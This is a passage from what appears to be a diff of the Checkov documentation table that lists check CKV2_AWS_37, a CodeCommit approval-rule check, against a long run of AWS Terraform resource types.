[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 770 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 771 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 772 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_peering_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 773 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 774 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 775 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 776 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_route_table_propagation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 777 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 778 | CKV2_AWS_37 | resource | aws_ec2_transit_gateway_vpc_attachment_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 779 | CKV2_AWS_37 | resource | aws_ecr_lifecycle_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 780 | CKV2_AWS_37 | resource | aws_ecr_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 781 | CKV2_AWS_37 | resource | aws_ecr_repository_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 782 | CKV2_AWS_37 | resource | aws_ecs_capacity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 783 | CKV2_AWS_37 | resource | aws_ecs_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 784 | CKV2_AWS_37 | resource | aws_ecs_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 785 | CKV2_AWS_37 | resource | aws_ecs_task_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 786 | CKV2_AWS_37 | resource | aws_efs_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 787 | CKV2_AWS_37 | resource | aws_efs_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 788 | CKV2_AWS_37 | resource | aws_efs_file_system_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 789 | CKV2_AWS_37 | resource | aws_efs_mount_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 790 | CKV2_AWS_37 | resource | aws_egress_only_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 791 | CKV2_AWS_37 | resource | aws_eip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 792 | CKV2_AWS_37 | resource | aws_eip_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 793 | CKV2_AWS_37 | resource | aws_eks_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 794 | CKV2_AWS_37 | resource | aws_eks_fargate_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 795 | CKV2_AWS_37 | resource | aws_eks_node_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 796 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 797 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_application_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 798 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_configuration_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 799 | CKV2_AWS_37 | resource | aws_elastic_beanstalk_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 800 | CKV2_AWS_37 | resource | aws_elasticache_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 801 | CKV2_AWS_37 | resource | aws_elasticache_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 802 | CKV2_AWS_37 | resource | aws_elasticache_replication_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 803 | CKV2_AWS_37 | resource | aws_elasticache_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 804 | CKV2_AWS_37 | resource | aws_elasticache_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 805 | CKV2_AWS_37 | resource | aws_elasticsearch_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 806 | CKV2_AWS_37 | resource | aws_elasticsearch_domain_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 807 | CKV2_AWS_37 | resource | aws_elastictranscoder_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 808 | CKV2_AWS_37 | resource | aws_elastictranscoder_preset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 809 | CKV2_AWS_37 | resource | aws_elb | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 810 | CKV2_AWS_37 | resource | aws_elb_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 811 | CKV2_AWS_37 | resource | aws_emr_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 812 | CKV2_AWS_37 | resource | aws_emr_instance_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 813 | CKV2_AWS_37 | resource | aws_emr_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 814 | CKV2_AWS_37 | resource | aws_flow_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 815 | CKV2_AWS_37 | resource | aws_fms_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 816 | CKV2_AWS_37 | resource | aws_fsx_lustre_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 817 | CKV2_AWS_37 | resource | aws_fsx_windows_file_system | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 818 | CKV2_AWS_37 | resource | aws_gamelift_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 819 | CKV2_AWS_37 | resource | aws_gamelift_build | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 820 | CKV2_AWS_37 | resource | aws_gamelift_fleet | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 821 | CKV2_AWS_37 | resource | aws_gamelift_game_session_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 822 | CKV2_AWS_37 | resource | aws_glacier_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 823 | CKV2_AWS_37 | resource | aws_glacier_vault_lock | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 824 | CKV2_AWS_37 | resource | aws_globalaccelerator_accelerator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 825 | CKV2_AWS_37 | resource | aws_globalaccelerator_endpoint_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 826 | CKV2_AWS_37 | resource | aws_globalaccelerator_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 827 | CKV2_AWS_37 | resource | aws_glue_catalog_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 828 | CKV2_AWS_37 | resource | aws_glue_catalog_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 829 | CKV2_AWS_37 | resource | aws_glue_classifier | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 830 | CKV2_AWS_37 | resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 831 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 832 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 833 | CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 834 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 835 | CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 836 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 837 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 838 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 839 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 840 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 841 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 842 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 843 | CKV2_AWS_37 | resource | aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 844 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 845 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 846 | CKV2_AWS_37 | resource | aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 847 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 848 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 849 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 850 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 851 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 852 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 853 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 854 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 855 | CKV2_AWS_37 | resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 856 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 857 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 858 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 859 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 860 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 861 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 862 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 863 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 864 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 865 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 866 | CKV2_AWS_37 | resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 867 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 868 | CKV2_AWS_37 | resource | aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 869 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 870 | CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 871 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 872 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 873 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 874 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 875 | CKV2_AWS_37 | resource | aws_iot_role_alias 